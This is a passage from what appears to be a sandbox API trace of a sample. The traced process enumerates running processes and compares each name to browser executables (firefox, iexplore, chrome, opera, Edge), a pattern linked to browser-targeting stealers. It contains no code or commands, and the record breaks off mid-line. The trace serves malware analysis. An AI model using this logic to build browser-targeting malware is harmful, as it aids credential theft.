lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0175.860] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0175.860] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0175.860] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0175.860] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.860] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.860] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0175.860] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0175.860] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0175.860] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0175.860] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.860] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0175.861] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0175.861] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0175.861] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0175.861] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0175.861] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.861] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.862] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0175.862] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0175.862] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0175.862] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0175.862] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.862] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0175.862] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0175.862] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0175.862] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0175.862] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0175.862] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.862] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0175.863] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0175.863] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0175.863] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0175.863] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0175.863] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.863] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0175.863] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0175.863] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0175.863] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0175.863] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0175.863] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.863] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0175.864] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0175.864] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0175.864] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0175.864] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0175.864] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.864] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.865] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.865] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.865] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.866] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.866] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.866] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.867] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.867] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.867] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.867] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.867] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.867] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.868] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0175.868] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0175.868] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0175.868] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0175.868] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.868] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.868] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.868] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.868] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.868] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.868] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.868] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.869] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.869] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.869] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.869] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.869] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.869] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0175.869] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0175.870] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0175.870] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0175.870] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0175.870] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.870] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0175.870] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0175.870] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0175.870] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0175.870] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0175.870] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.870] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.871] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0175.871] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0175.871] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0175.871] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0175.871] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.871] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.871] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.871] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.871] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.871] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0175.871] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.871] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.872] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0175.872] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0175.872] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0175.872] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0175.872] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.872] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0175.872] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0175.872] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0175.872] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0175.872] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0175.873] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.873] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0175.873] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0175.873] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0175.873] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0175.873] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0175.873] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.873] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0175.874] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0175.874] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0175.874] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0175.874] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0175.874] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.874] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0175.874] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0175.874] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0175.874] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0175.874] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0175.874] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.874] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0175.875] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0175.875] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0175.875] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0175.875] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0175.875] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.875] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0175.875] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0175.875] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0175.875] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0175.875] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0175.876] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.876] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0175.876] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0175.876] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0175.876] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0175.876] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0175.876] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.876] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0175.877] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0175.877] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0175.877] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0175.877] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0175.877] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.877] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0175.877] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0175.877] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0175.877] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0175.877] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0175.877] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.877] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0175.878] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0175.878] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0175.878] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0175.878] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0175.878] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.878] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0175.878] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0175.878] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0175.878] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0175.878] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0175.879] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.879] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0175.879] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0175.879] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0175.879] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0175.879] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0175.879] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.879] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0175.880] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0175.880] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0175.880] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0175.880] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0175.880] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0175.880] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0175.880] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0175.880] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0175.880] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0175.880] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.880] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0175.881] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0175.881] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0175.881] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0175.881] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0175.881] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.881] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0175.881] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0175.881] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0175.881] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0175.882] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0175.882] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.882] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, 